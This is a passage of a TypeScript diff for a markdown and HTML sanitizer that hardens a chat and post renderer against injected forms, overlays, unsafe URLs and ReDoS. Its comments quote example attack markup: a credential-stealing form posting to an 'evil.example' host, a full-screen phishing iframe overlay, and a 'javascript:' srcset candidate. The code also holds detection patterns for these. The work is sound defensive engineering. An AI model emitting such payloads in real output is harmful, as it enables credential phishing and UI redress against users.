// ---------------------------------------------------------------------------
|
|
164
|
+
/**
|
|
165
|
+
* Per-tag attribute allowances layered on top of hast-util-sanitize's
|
|
166
|
+
* defaultSchema. Property names are hast camelCase. Attribute survival
|
|
167
|
+
* matters as much as tag survival — an attribute-stripped `<video>` is a
|
|
168
|
+
* sourceless player (see plan: "video-survives-sanitize fixture").
|
|
169
|
+
*/
|
|
170
|
+
const EXTRA_ATTRIBUTES: Record<string, Array<string | [string, ...unknown[]]>> = {
|
|
171
|
+
// `style` is allowed on the tags the 2026-07 content-store audit found it
|
|
172
|
+
// on in REAL published posts (div.takeaway, table styling, reddit
|
|
173
|
+
// blockquotes). This matches pre-unification behavior on BOTH surfaces —
|
|
174
|
+
// neither old renderer stripped style — so it is parity, not loosening;
|
|
175
|
+
// the URL-scheme guards in rehypeStripUnsafe still apply to attributes.
|
|
176
|
+
'*': ['className', 'id', 'data*', 'dir', 'title', 'lang'],
|
|
177
|
+
a: ['target', 'rel', 'href'],
|
|
178
|
+
div: ['style'],
|
|
179
|
+
span: ['style'],
|
|
180
|
+
p: ['style'],
|
|
181
|
+
blockquote: ['style', 'cite'],
|
|
182
|
+
td: ['colSpan', 'rowSpan', 'align', 'style'],
|
|
183
|
+
th: ['colSpan', 'rowSpan', 'align', 'scope', 'style'],
|
|
184
|
+
img: ['src', 'srcSet', 'sizes', 'alt', 'width', 'height', 'loading', 'decoding'],
|
|
185
|
+
iframe: ['src', 'width', 'height', 'allow', 'allowFullScreen', 'frameBorder', 'loading', 'referrerPolicy', 'style'],
|
|
186
|
+
video: ['src', 'poster', 'controls', 'width', 'height', 'loop', 'muted', 'autoPlay', 'playsInline', 'preload'],
|
|
187
|
+
source: ['src', 'type', 'media', 'srcSet', 'sizes'],
|
|
188
|
+
audio: ['src', 'controls', 'loop', 'muted', 'preload'],
|
|
189
|
+
track: ['src', 'kind', 'srcLang', 'label', 'default'],
|
|
190
|
+
time: ['dateTime'],
|
|
191
|
+
details: ['open'],
|
|
192
|
+
// Form elements (allow the benign presentational subset).
|
|
193
|
+
//
|
|
194
|
+
// `input` carries EXACTLY the GFM task-list contract and nothing else.
|
|
195
|
+
// Dropping the attribute widening alone was not enough: defaultSchema
|
|
196
|
+
// pins `required.input = { type:'checkbox', disabled:true }`, and
|
|
197
|
+
// `required` force-ADDS those properties regardless of what the author
|
|
198
|
+
// wrote — so `<input type="text" placeholder="email">` still came out as
|
|
199
|
+
// a disabled checkbox. `buildSanitizeSchema` therefore clears
|
|
200
|
+
// `required.input` (remark-gfm emits `type="checkbox" disabled` on task
|
|
201
|
+
// items itself, so the coercion was redundant) and the contract is
|
|
202
|
+
// expressed here instead: type is pinned to the literal `checkbox`, so a
|
|
203
|
+
// text input degrades to a bare `<input>` rather than a fake checkbox.
|
|
204
|
+
input: [['type', 'checkbox'], 'checked', 'disabled'],
|
|
205
|
+
button: ['type', 'disabled', 'name', 'value'],
|
|
206
|
+
// Legacy presentational tag — without its own attributes the sanitizer
|
|
207
|
+
// would keep `<font>` but strip everything that makes it do anything.
|
|
208
|
+
font: ['color', 'size', 'face'],
|
|
209
|
+
select: ['disabled', 'multiple', 'name'],
|
|
210
|
+
option: ['value', 'selected', 'disabled'],
|
|
211
|
+
optgroup: ['label', 'disabled'],
|
|
212
|
+
textarea: ['rows', 'cols', 'placeholder', 'disabled', 'readOnly', 'name'],
|
|
213
|
+
label: ['htmlFor'],
|
|
214
|
+
col: ['span'],
|
|
215
|
+
colgroup: ['span'],
|
|
216
|
+
}
|
|
217
|
+
|
|
218
|
+
/**
|
|
219
|
+
* SVG presentation/geometry attributes, keyed the way hast keys them:
|
|
220
|
+
* property-information normalizes `font-size` → `fontSize`,
|
|
221
|
+
* `stroke-dasharray` → `strokeDasharray`, … BEFORE the sanitizer sees the
|
|
222
|
+
* tree, so ONLY the camelCase spellings are load-bearing. The dashed
|
|
223
|
+
* spellings previously listed alongside them were dead weight (they never
|
|
224
|
+
* matched anything) and are gone; do not re-add them.
|
|
225
|
+
*
|
|
226
|
+
* `style` is allowed here for parity with div/span/p (same 2026-07 audit
|
|
227
|
+
* rationale — authored SVG carries inline `style` and both pre-unification
|
|
228
|
+
* renderers kept it; the URL guards in rehypeStripUnsafe still apply).
|
|
229
|
+
*/
|
|
230
|
+
const SVG_ATTRIBUTES = [
|
|
231
|
+
'viewBox', 'xmlns', 'd', 'fill', 'stroke', 'cx', 'cy', 'r', 'rx', 'ry',
|
|
232
|
+
'x', 'y', 'x1', 'y1', 'x2', 'y2', 'points', 'transform', 'opacity',
|
|
233
|
+
'offset', 'width', 'height', 'style',
|
|
234
|
+
// NOTE the exact casing: property-information's SVG map uses
|
|
235
|
+
// `strokeDashArray` / `strokeDashOffset` / `strokeMiterLimit` (capital
|
|
236
|
+
// A/O/L), NOT the react-DOM spellings. A near-miss here fails SILENTLY —
|
|
237
|
+
// the attribute is simply stripped. Verify against
|
|
238
|
+
// node_modules/property-information/lib/svg.js before adding one.
|
|
239
|
+
'strokeWidth', 'strokeDashArray', 'strokeDashOffset', 'strokeMiterLimit',
|
|
240
|
+
'strokeOpacity', 'strokeLinecap', 'strokeLinejoin',
|
|
241
|
+
'fillRule', 'fillOpacity',
|
|
242
|
+
'stopColor', 'stopOpacity',
|
|
243
|
+
'fontSize', 'fontFamily', 'fontWeight', 'fontStyle', 'fontStretch',
|
|
244
|
+
'textAnchor', 'dominantBaseline', 'alignmentBaseline', 'letterSpacing',
|
|
245
|
+
'dx', 'dy', 'markerEnd', 'markerMid', 'markerStart',
|
|
246
|
+
'gradientUnits', 'gradientTransform', 'patternUnits', 'maskUnits',
|
|
247
|
+
'preserveAspectRatio',
|
|
248
|
+
'clipPath', 'clipRule',
|
|
249
|
+
// `href` / `xlink:href` stay DELIBERATELY DISALLOWED on SVG elements:
|
|
250
|
+
// `<use href>` pulls in an external document fragment and the hast key
|
|
251
|
+
// (`xlinkHref`) is outside rehypeStripUnsafe's URL_ATTRS check, so it
|
|
252
|
+
// would be an unguarded URL sink. Consequence, stated plainly: PASTED
|
|
253
|
+
// ICON SPRITES THAT RELY ON `<use href="#id">` RENDER EMPTY. Hand-drawn
|
|
254
|
+
// inline SVG (the audited real-content case) is unaffected.
|
|
255
|
+
]
|
|
256
|
+
|
|
257
|
+
export interface BuildSanitizeSchemaOptions {
|
|
258
|
+
extraAllowedHtmlTags?: string[]
|
|
259
|
+
}
|
|
260
|
+
|
|
261
|
+
/**
|
|
262
|
+
* The engine's sanitize schema: defaultSchema ∪ SAFE_HTML_TAGS ∪ extras.
|
|
263
|
+
* - `extraAllowedHtmlTags` is unioned into tagNames here AND into the
|
|
264
|
+
* pre-pass set (buildEffectiveTagSet) — the coupled-allowlist invariant.
|
|
265
|
+
* - `clobberPrefix: ''` + empty `clobber`: authored raw-HTML anchors
|
|
266
|
+
* (`<h2 id="…">`) keep their ids so `[jump](#anchor)` deep-links work.
|
|
267
|
+
* (The renderer's own heading ids are injected at the React layer,
|
|
268
|
+
* post-rehype, and were never affected.)
|
|
269
|
+
* - `card`/`mention` protocols registered for href so chat markers survive
|
|
270
|
+
* (the urlTransform below is the second gate).
|
|
271
|
+
*/
|
|
272
|
+
export function buildSanitizeSchema(options: BuildSanitizeSchemaOptions = {}) {
|
|
273
|
+
// Canonical spelling AND lowercase for every tag: parse5 emits SVG
|
|
274
|
+
// foreign-content tags camelCased (`linearGradient`), HTML tags
|
|
275
|
+
// lowercased — admitting both keeps the schema list a superset of the
|
|
276
|
+
// (lowercased) pre-pass set, so the two are equal case-insensitively.
|
|
277
|
+
const tagNames = new Set<string>()
|
|
278
|
+
for (const tag of effectiveTagList(options.extraAllowedHtmlTags)) {
|
|
279
|
+
tagNames.add(tag)
|
|
280
|
+
tagNames.add(tag.toLowerCase())
|
|
281
|
+
}
|
|
282
|
+
|
|
283
|
+
const attributes: Record<string, Array<string | [string, ...unknown[]]>> = {
|
|
284
|
+
...(defaultSchema.attributes as Record<string, Array<string | [string, ...unknown[]]>>),
|
|
285
|
+
}
|
|
286
|
+
for (const [tag, attrs] of Object.entries(EXTRA_ATTRIBUTES)) {
|
|
287
|
+
attributes[tag] = [...(attributes[tag] ?? []), ...attrs]
|
|
288
|
+
}
|
|
289
|
+
for (const tag of SVG_TAGS) {
|
|
290
|
+
attributes[tag] = [...(attributes[tag] ?? []), ...SVG_ATTRIBUTES]
|
|
291
|
+
const lower = tag.toLowerCase()
|
|
292
|
+
if (lower !== tag) attributes[lower] = [...(attributes[lower] ?? []), ...SVG_ATTRIBUTES]
|
|
293
|
+
}
|
|
294
|
+
|
|
295
|
+
// MAKE THE PER-TAG LISTS ACTUALLY AUTHORITATIVE.
|
|
296
|
+
//
|
|
297
|
+
// `hast-util-sanitize` looks a property up in `attributes[tagName]` and, when
|
|
298
|
+
// it is ABSENT there, RETRIES against `attributes['*']` (see its
|
|
299
|
+
// `properties()`). A per-tag list therefore narrows nothing on its own — it
|
|
300
|
+
// only ADDS. defaultSchema (GitHub's schema) puts the whole form vocabulary
|
|
301
|
+
// on `*` — `action`, `method`, `encType`, `name`, `value`, `size`,
|
|
302
|
+
// `maxLength`, `readOnly`, `accept`, `multiple` — so the `input` entry above,
|
|
303
|
+
// documented as "EXACTLY the GFM task-list contract and nothing else", was
|
|
304
|
+
// inert: `<input name="password" size="40">` kept both attributes.
|
|
305
|
+
//
|
|
306
|
+
// Verified consequence before this filter: the markdown
|
|
307
|
+
// <form action="https://evil.example/steal" method="post">
|
|
308
|
+
// <input name="email"><input name="password">
|
|
309
|
+
// <button type="submit">Sign in</button></form>
|
|
310
|
+
// rendered VERBATIM on the CHAT surface — a working cross-origin credential
|
|
311
|
+
// form inside trusted app chrome, from untrusted model output, one click from
|
|
312
|
+
// submitting. `form` has no per-tag entry at all, so it took `action`/`method`
|
|
313
|
+
// straight from `*`.
|
|
314
|
+
//
|
|
315
|
+
// Stripping these from `*` leaves every legitimate use intact, because the
|
|
316
|
+
// tags that genuinely need them declare them per-tag (`button`, `select`,
|
|
317
|
+
// `option`, `textarea` for `name`/`value`, `input` for `checked`).
|
|
318
|
+
//
|
|
319
|
+
// The two non-form uses that in principle relied on `*` — `<a name="anchor">`
|
|
320
|
+
// and `<li value="3">` — were checked and need NO re-declaration: the base
|
|
321
|
+
// `a` / `li` renderers build their own elements and never forwarded either
|
|
322
|
+
// attribute, so neither reached the DOM before this filter (verified by
|
|
323
|
+
// reverting it). Pinned by ./__tests__/sanitize-render.test.tsx so the fact
|
|
324
|
+
// stays recorded rather than re-derived.
|
|
325
|
+
const STAR_FORM_ATTRIBUTES = new Set([
|
|
326
|
+
'action', 'method', 'encType', 'name', 'value',
|
|
327
|
+
'size', 'maxLength', 'readOnly', 'accept', 'acceptCharset', 'multiple', 'prompt',
|
|
328
|
+
])
|
|
329
|
+
attributes['*'] = (attributes['*'] ?? []).filter((attr) => {
|
|
330
|
+
const key = Array.isArray(attr) ? attr[0] : attr
|
|
331
|
+
return !STAR_FORM_ATTRIBUTES.has(key as string)
|
|
332
|
+
})
|
|
333
|
+
|
|
334
|
+
// SVG-only tags are pinned to an `svg` ancestor (canonical AND lowercase
|
|
335
|
+
// spelling, matching the tagNames treatment above) so a bare `<title>` /
|
|
336
|
+
// `<text>` / `<g>` in prose is DROPPED instead of hijacking the page.
|
|
337
|
+
const ancestors: Record<string, string[]> = {
|
|
338
|
+
...(defaultSchema.ancestors as Record<string, string[]> | undefined),
|
|
339
|
+
}
|
|
340
|
+
for (const [tag, required] of Object.entries(SVG_ONLY_ANCESTORS)) {
|
|
341
|
+
ancestors[tag] = required
|
|
342
|
+
ancestors[tag.toLowerCase()] = required
|
|
343
|
+
}
|
|
344
|
+
|
|
345
|
+
// `required.input` is CLEARED — see the `input` note in EXTRA_ATTRIBUTES.
|
|
346
|
+
// defaultSchema force-adds `type="checkbox" disabled` to every `<input>`,
|
|
347
|
+
// rewriting authored text inputs into fake disabled checkboxes; remark-gfm
|
|
348
|
+
// already emits both properties on real task-list items, so nothing is
|
|
349
|
+
// lost. The attribute allowlist pins `type` to the literal `checkbox`.
|
|
350
|
+
const required: Record<string, Record<string, unknown>> = {
|
|
351
|
+
...(defaultSchema.required as Record<string, Record<string, unknown>> | undefined),
|
|
352
|
+
}
|
|
353
|
+
delete required.input
|
|
354
|
+
|
|
355
|
+
return {
|
|
356
|
+
...defaultSchema,
|
|
357
|
+
tagNames: [...tagNames],
|
|
358
|
+
attributes,
|
|
359
|
+
ancestors,
|
|
360
|
+
required,
|
|
361
|
+
clobberPrefix: '',
|
|
362
|
+
clobber: [],
|
|
363
|
+
protocols: {
|
|
364
|
+
...defaultSchema.protocols,
|
|
365
|
+
href: [...(defaultSchema.protocols?.href ?? []), 'card', 'mention'],
|
|
366
|
+
},
|
|
367
|
+
}
|
|
368
|
+
}
|
|
369
|
+
|
|
370
|
+
// ---------------------------------------------------------------------------
|
|
371
|
+
// rehypeStripUnsafe — defense-in-depth strip pass (kept verbatim from the
|
|
372
|
+
// pre-unification SimpleMarkdownRenderer)
|
|
373
|
+
// ---------------------------------------------------------------------------
|
|
374
|
+
const EVENT_HANDLER_ATTR_RE = /^on[a-z]+$/i
|
|
375
|
+
|
|
376
|
+
/**
|
|
377
|
+
* CSS declarations that take an element OUT of the document flow, i.e. the
|
|
378
|
+
* primitive every UI-redress payload needs. Matched per declaration (the
|
|
379
|
+
* `style` attribute is split on `;` first), so decorative styling on the same
|
|
380
|
+
* element is preserved. `inset` and the individual offsets are included because
|
|
381
|
+
* `position` alone is not the only lever — a `position:sticky` left behind with
|
|
382
|
+
* `top:0;z-index:…` still floats content over the page.
|
|
383
|
+
*/
|
|
384
|
+
const POSITIONING_DECL_RE =
|
|
385
|
+
/(?:^|[\s;])(?:position|z-index|inset(?:-block|-inline)?(?:-start|-end)?|top|right|bottom|left)\s*:/i
|
|
386
|
+
const JAVASCRIPT_URL_RE = /^[\s\x00-\x1f]*javascript:/i
|
|
387
|
+
const DATA_URL_RE = /^[\s\x00-\x1f]*data:/i
|
|
388
|
+
const URL_ATTRS = new Set([
|
|
389
|
+
'href',
|
|
390
|
+
'src',
|
|
391
|
+
'srcset',
|
|
392
|
+
'formaction',
|
|
393
|
+
'xlink:href',
|
|
394
|
+
'poster',
|
|
395
|
+
'data',
|
|
396
|
+
'action',
|
|
397
|
+
'background',
|
|
398
|
+
])
|
|
399
|
+
|
|
400
|
+
/**
|
|
401
|
+
* Returns true if any candidate in an `srcset` attribute has a dangerous
|
|
402
|
+
* URL scheme. srcset is a comma-separated candidate list — a single-URL
|
|
403
|
+
* check would miss a malicious second candidate
|
|
404
|
+
* (`"https://safe.png 1x, javascript:alert(1) 2x"`). Over-splitting on
|
|
405
|
+
* commas inside URL paths over-strips, which is the correct error bias.
|
|
406
|
+
*/
|
|
407
|
+
function srcsetHasUnsafeCandidate(srcset: string): boolean {
|
|
408
|
+
for (const candidate of srcset.split(',')) {
|
|
409
|
+
const url = candidate.trim().split(/\s+/)[0] ?? ''
|
|
410
|
+
if (JAVASCRIPT_URL_RE.test(url) || DATA_URL_RE.test(url)) return true
|
|
411
|
+
}
|
|
412
|
+
return false
|
|
413
|
+
}
|
|
414
|
+
|
|
415
|
+
const STRIP_ELEMENTS = new Set([
|
|
416
|
+
'script',
|
|
417
|
+
'style',
|
|
418
|
+
'noscript',
|
|
419
|
+
'noembed',
|
|
420
|
+
'object',
|
|
421
|
+
'embed',
|
|
422
|
+
'applet',
|
|
423
|
+
'base',
|
|
424
|
+
'meta',
|
|
425
|
+
])
|
|
426
|
+
|
|
427
|
+
export function rehypeStripUnsafe() {
|
|
428
|
+
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
|
429
|
+
return (tree: any) => {
|
|
430
|
+
visit(tree, 'element', (node: any, index: number | undefined, parent: any) => {
|
|
431
|
+
const tag = String(node.tagName ?? '').toLowerCase()
|
|
432
|
+
if (STRIP_ELEMENTS.has(tag)) {
|
|
433
|
+
if (parent && typeof index === 'number') {
|
|
434
|
+
parent.children.splice(index, 1)
|
|
435
|
+
// Return the numeric index so the walker resumes at the slot the
|
|
436
|
+
// removed node vacated.
|
|
437
|
+
return index
|
|
438
|
+
}
|
|
439
|
+
// Root-level strip element — neutralize in place.
|
|
440
|
+
node.children = []
|
|
441
|
+
node.tagName = 'span'
|
|
442
|
+
node.properties = {}
|
|
443
|
+
return
|
|
444
|
+
}
|
|
445
|
+
if (!node.properties || typeof node.properties !== 'object') return
|
|
446
|
+
for (const key of Object.keys(node.properties)) {
|
|
447
|
+
if (EVENT_HANDLER_ATTR_RE.test(key)) {
|
|
448
|
+
delete node.properties[key]
|
|
449
|
+
continue
|
|
450
|
+
}
|
|
451
|
+
if (URL_ATTRS.has(key.toLowerCase())) {
|
|
452
|
+
const raw = node.properties[key]
|
|
453
|
+
const v = Array.isArray(raw) ? raw[0] : raw
|
|
454
|
+
if (typeof v === 'string') {
|
|
455
|
+
const unsafe =
|
|
456
|
+
key.toLowerCase() === 'srcset'
|
|
457
|
+
? srcsetHasUnsafeCandidate(v)
|
|
458
|
+
: JAVASCRIPT_URL_RE.test(v) || DATA_URL_RE.test(v)
|
|
459
|
+
if (unsafe) {
|
|
460
|
+
delete node.properties[key]
|
|
461
|
+
continue
|
|
462
|
+
}
|
|
463
|
+
}
|
|
464
|
+
}
|
|
465
|
+
if (tag === 'iframe' && key.toLowerCase() === 'srcdoc') {
|
|
466
|
+
delete node.properties[key]
|
|
467
|
+
continue
|
|
468
|
+
}
|
|
469
|
+
// OVERLAY / UI-REDRESS GUARD. `style` is allowed (a content audit found
|
|
470
|
+
// real published posts relying on it for `div.takeaway`, table styling
|
|
471
|
+
// and reddit blockquotes), but the positioning subset of CSS is not a
|
|
472
|
+
// decoration — it is a way to lift untrusted markup out of the message
|
|
473
|
+
// body and put it over the whole application. Verified before this
|
|
474
|
+
// guard: a single chat message containing
|
|
475
|
+
// <iframe src="https://evil.example/phish"
|
|
476
|
+
// style="position:fixed;top:0;left:0;width:100vw;height:100vh;
|
|
477
|
+
// z-index:2147483647">
|
|
478
|
+
// rendered an attacker-controlled cross-origin document covering the
|
|
479
|
+
// entire viewport above every piece of app chrome (toasts at z-9999
|
|
480
|
+
// included); the `<span style="position:fixed;inset:0">` variant does the
|
|
481
|
+
// same with no frame at all. Chat content is model output, so this is
|
|
482
|
+
// reachable from untrusted input.
|
|
483
|
+
//
|
|
484
|
+
// Only the escape-the-flow declarations are dropped, and per-declaration
|
|
485
|
+
// rather than by discarding the whole attribute, so ordinary decorative
|
|
486
|
+
// styling on the same element survives. THE TRADE-OFF, STATED: authored
|
|
487
|
+
// content that legitimately wanted `position:sticky` (a pinned table
|
|
488
|
+
// header, say) loses it — deliberately, because there is no way to tell
|
|
489
|
+
// it apart from the redress payload at this layer, and a sticky header is
|
|
490
|
+
// a smaller loss than a full-page phishing surface.
|
|
491
|
+
if (key.toLowerCase() === 'style') {
|
|
492
|
+
const raw = node.properties[key]
|
|
493
|
+
if (typeof raw === 'string' && POSITIONING_DECL_RE.test(raw)) {
|
|
494
|
+
const cleaned = raw
|
|
495
|
+
.split(';')
|
|
496
|
+
.filter((decl) => !POSITIONING_DECL_RE.test(decl))
|
|
497
|
+
.join(';')
|
|
498
|
+
.trim()
|
|
499
|
+
if (cleaned === '' || cleaned === ';') delete node.properties[key]
|
|
500
|
+
else node.properties[key] = cleaned
|
|
501
|
+
}
|
|
502
|
+
}
|
|
503
|
+
}
|
|
504
|
+
})
|
|
505
|
+
}
|
|
506
|
+
}
|
|
507
|
+
|
|
508
|
+
// ---------------------------------------------------------------------------
|
|
509
|
+
// escapeUnknownHtmlTags — TEXT pre-pass (React 19 crash guard)
|
|
510
|
+
// ---------------------------------------------------------------------------
|
|
511
|
+
// ReDoS-safe shape (CodeQL polynomial-regex hardening): every quantifier is
|
|
512
|
+
// hard-bounded (tag name ≤63 chars, attrs ≤4096) so matching is
|
|
513
|
+
// constant-time per tag. Anything longer falls through as plain text —
|
|
514
|
+
// the safe-degrade behavior for HTML-in-markdown.
|
|
515
|
+
const TAG_LIKE_REGEX = /<(\/?)([a-zA-Z][a-zA-Z0-9-]{0,63})((?:\s[^>]{0,4096}?)?)(\/?)>/g
|
|
516
|
+
|
|
517
|
+
/**
|
|
518
|
+
* Tags whose HTML content model is RAWTEXT / RCDATA / PLAINTEXT: once parse5
|
|
519
|
+
* sees the start tag, EVERYTHING up to the matching end tag (or, if there is
|
|
520
|
+
* none, to end of input) is consumed as that element's text — headings,
|
|
521
|
+
* paragraphs, list items and all.
|
|
522
|
+
*
|
|
523
|
+
* The tokenizer runs BEFORE the sanitizer, so an allowlist entry (or an
|
|
524
|
+
* `ancestors` pin, as `title` got in round 2) cannot undo the damage: by the
|
|
525
|
+
* time the schema is consulted, the rest of the message is already a single
|
|
526
|
+
* text node hanging off the wrong element. Observed with the unclosed forms:
|
|
527
|
+
* `<textarea>` → the remainder of the message becomes the editable value
|
|
528
|
+
* of a live textarea
|
|
529
|
+
* `<iframe>` → the remainder is swallowed into an `about:blank` frame
|
|
530
|
+
* `<title>` → the remainder de-structures (headings stop being headings)
|
|
531
|
+
* Any chat message or post that merely MENTIONS one of these in prose — an
|
|
532
|
+
* LLM explaining HTML forms will — mangles everything after it.
|
|
533
|
+
*
|
|
534
|
+
* The TEXT pre-pass is the layer built for exactly this: it runs before
|
|
535
|
+
* parse5 and is purely textual. An opening tag from this set is escaped
|
|
536
|
+
* unless its matching `</tag>` appears LATER in the source, in which case the
|
|
537
|
+
* RAWTEXT span is bounded and the element renders normally (see the
|
|
538
|
+
* `closed-*` fixtures). This check is deliberately independent of the
|
|
539
|
+
* allowlist — it constrains tags the sanitizer WOULD keep.
|
|
540
|
+
*/
|
|
541
|
+
const RAWTEXT_TAGS = new Set([
|
|
542
|
+
'title', 'textarea', 'iframe', 'xmp', 'noembed', 'noframes', 'plaintext',
|
|
543
|
+
])
|
|
544
|
+
|
|
545
|
+
/**
|
|
546
|
+
* Fenced code blocks and inline code spans — the regions whose `<tags>` are
|
|
547
|
+
* literal content and must survive the escaping pass verbatim.
|
|
548
|
+
*
|
|
549
|
+
* Drives the escaping CARVE in `escapeUnknownHtmlTags`. It is deliberately
|
|
550
|
+
* NARROWER than what the MASK now understands: the mask is the security
|
|
551
|
+
* boundary (too-narrow ⇒ a live `<textarea>` swallows the document) while the
|
|
552
|
+
* carve is cosmetic (too-narrow ⇒ a code sample renders as escaped text), so
|
|
553
|
+
* they are allowed to differ — but only in that direction, and that is now
|
|
554
|
+
* ENFORCED rather than assumed: `escapeUnknownHtmlTags` protects only the
|
|
555
|
+
* INTERSECTION of carve and mask, so a span this regex over-detects is escaped
|
|
556
|
+
* instead of sheltered. See the CARVE DECISION note on `buildCloserHaystack`.
|
|
557
|
+
*
|
|
558
|
+
* Deliberately NARROWER than `createFenceTracker`'s CommonMark notion: this is
|
|
559
|
+
* a flat regex over source TEXT with no line-state, so it only recognizes a
|
|
560
|
+
* fence that is CLOSED by a same-marker run. That is the correct bias here —
|
|
561
|
+
* an unclosed fence leaves its body UNPROTECTED, so a `<textarea>` inside it
|
|
562
|
+
* gets escaped (visible as escaped text) rather than left live. Using the real
|
|
563
|
+
* tracker would mean re-deriving character offsets from line state for a pass
|
|
564
|
+
* that is explicitly not a security boundary; the narrow form fails safe.
|
|
565
|
+
* `~{3,}` and the CommonMark 0..3-space indent ARE handled (they were not
|
|
566
|
+
* before: a `~~~` block containing `<textarea>` rendered as escaped text).
|
|
567
|
+
*
|
|
568
|
+
* The MASK does NOT use this regex's fence alternative at all any more — see
|
|
569
|
+
* `buildCloserHaystack`, which derives its code regions from the real
|
|
570
|
+
* `createFenceTracker` (plus indented / blockquoted / commented code). Only the
|
|
571
|
+
* INLINE-CODE region is derived separately, by `findInlineCodeRanges` below —
|
|
572
|
+
* which is no longer a regex and no longer shares this one's length cap.
|
|
573
|
+
*/
|
|
574
|
+
const PROTECTED_SPAN_RE =
|
|
575
|
+
/^ {0,3}(`{3,}|~{3,})[\s\S]*?^ {0,3}\1[^\n]*$|(`+)[^\n]{0,4096}?\2/gm
|
|
576
|
+
|
|
577
|
+
/**
|
|
578
|
+
* The INLINE-CODE half of `PROTECTED_SPAN_RE`, on its own — the mask's only
|
|
579
|
+
* non-line-state code region. Everything block-level (fences, indented code,
|
|
580
|
+
* blockquoted code, HTML comments) is derived from line state instead, because
|
|
581
|
+
* a flat regex cannot express CommonMark's closer rules: `PROTECTED_SPAN_RE`
|
|
582
|
+
* ends a fenced span at the FIRST same-marker run even when that run carries an
|
|
583
|
+
* info string (```` ```html ````), which CommonMark forbids on a closer — so the
|
|
584
|
+
* span ended early and the real code content was left unmasked.
|
|
585
|
+
*
|
|
586
|
+
* NO LENGTH CAP, AND NO REGEX (round 16 — SECURITY). This used to be
|
|
587
|
+
* `` /(`+)[^\n]{0,4096}?\1/g ``, sharing `PROTECTED_SPAN_RE`'s 4096-char
|
|
588
|
+
* ReDoS bound. An inline span LONGER than the cap matched NEITHER regex, so the
|
|
589
|
+
* mask simply skipped it — leaving a `</textarea>` written inside that span
|
|
590
|
+
* VISIBLE in the closer haystack, `hasLaterCloser` true, the prose opener LIVE,
|
|
591
|
+
* and parse5 swallowing the rest of the message as the textarea's value.
|
|
592
|
+
* A clean cliff, padding length the only variable: span content ≤4094 chars ⇒
|
|
593
|
+
* blanked, opener escaped, 0 live textareas; ≥4099 ⇒ closer visible, 1 live
|
|
594
|
+
* textarea. That is a fail-OPEN in the security boundary, and it contradicts
|
|
595
|
+
* this module's own contract that every mask approximation "rounds towards
|
|
596
|
+
* blanking".
|
|
597
|
+
*
|
|
598
|
+
* THE BOUND COULD NOT SIMPLY BE DROPPED. `[^\n]` confines backtracking to one
|
|
599
|
+
* LINE, but a single line is not a small input — a chat message can be one.
|
|
600
|
+
* MEASURED (round 16, this repo's vitest env, one line of nothing but
|
|
601
|
+
* backticks — the pathological shape; figures from plain node are within 3%):
|
|
602
|
+
*
|
|
603
|
+
* input capped regex uncapped regex this linear scan
|
|
604
|
+
* 50K chars 295 ms (5.9 µs/c) 615 ms (12.3 µs/c) 0.69 ms (14 ns/c)
|
|
605
|
+
* 200K chars 1220 ms (6.1 µs/c) 9772 ms (48.9 µs/c) 0.42 ms (2 ns/c)
|
|
606
|
+
* 800K chars 5072 ms (6.3 µs/c) 158263 ms (198 µs/c) — (node)
|
|
607
|
+
*
|
|
608
|
+
* The capped regex is flat per char (linear, huge constant); the UNCAPPED one
|
|
609
|
+
* is plainly QUADRATIC — 31x the capped cost at 800KB and still climbing. Every
|
|
610
|
+
* other shape probed (lone tick + text, `` `` `` + text, one tick per 32 chars,
|
|
611
|
+
* one tick per line) is ≈2-4 ns/char in BOTH regex spellings, so the blowup is
|
|
612
|
+
* specific to long backtick runs — which an attacker controls. The cap was load
|
|
613
|
+
* bearing; the REGEX is what had to go. A realistic 260KB backtick-dense
|
|
614
|
+
* message (`Use `foo` and `bar` here.` × 10000) scans in 4.2 ms.
|
|
615
|
+
*
|
|
616
|
+
* `findInlineCodeRanges` is a LINEAR index scan that reproduces the old
|
|
617
|
+
* regex's match semantics exactly (verified by differential fuzz against the
|
|
618
|
+
* uncapped regex) with no backtracking and no cap: per line it collects the
|
|
619
|
+
* backtick RUNS, then for each opener run of length `n` picks the largest
|
|
620
|
+
* closer length `k ≤ n` that occurs later on the line — either inside the same
|
|
621
|
+
* run (needs `n ≥ 2k`, mirroring the regex giving back backticks from a greedy
|
|
622
|
+
* `` (`+) ``) or at the earliest following run of length ≥ k — and takes the
|
|
623
|
+
* EARLIEST such position (the lazy quantifier). The forward walk is amortized
|
|
624
|
+
* O(1) per run because the scan cursor jumps past every run it skipped.
|
|
625
|
+
*
|
|
626
|
+
* `PROTECTED_SPAN_RE` (the CARVE) KEEPS its cap, deliberately: the two
|
|
627
|
+
* consumers round in OPPOSITE directions, see the note on
|
|
628
|
+
* `escapeLeftoverTagStarts`. In the carve, "not known to be code" means ESCAPE,
|
|
629
|
+
* so an over-cap span there costs a code sample rendered as escaped text.
|
|
630
|
+
*/
|
|
631
|
+
const BACKTICK_CODE = 0x60
|
|
632
|
+
|
|
633
|
+
/**
|
|
634
|
+
* PARAGRAPH SEGMENTS, NOT LINES (round 18 — SECURITY). A CommonMark code span
|
|
635
|
+
* CROSSES LINE BREAKS: `` `foo\n</textarea>` `` is one `inlineCode` node, so
|
|
636
|
+
* that `</textarea>` is a code sample and not a closer — yet this scan (and
|
|
637
|
+
* `PROTECTED_SPAN_RE`, whose body class is `[^\n]`) was strictly PER LINE, so
|
|
638
|
+
* the mask never saw the span, the closer stayed visible in the haystack,
|
|
639
|
+
* `hasLaterCloser` returned true, and a prose `<textarea>` above it stayed LIVE
|
|
640
|
+
* (`escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL; the renderer
|
|
641
|
+
* emitted `<code>foo </textarea></code>` — proving the closer is a code sample
|
|
642
|
+
* — beside a live textarea swallowing the prose). This is the shape that is not
|
|
643
|
+
* a CONTAINER at all, so no container sweep could ever have reached it.
|
|
644
|
+
*
|
|
645
|
+
* A code span CANNOT cross a paragraph break, so the scan unit is a maximal run
|
|
646
|
+
* of non-blank lines. Blank lines still terminate a segment, which keeps the
|
|
647
|
+
* fail-CLOSED direction (an unterminated opener consumes at most its own
|
|
648
|
+
* paragraph, never the rest of the document) and keeps the bound linear — the
|
|
649
|
+
* `suffMax` / cursor structure is unchanged, `\n` is simply an ordinary
|
|
650
|
+
* character inside a segment.
|
|
651
|
+
*
|
|
652
|
+
* `PROTECTED_SPAN_RE` (the CARVE) is deliberately left per-line: it rounds the
|
|
653
|
+
* other way, so at worst a multi-line code sample renders as escaped text.
|
|
654
|
+
*/
|
|
655
|
+
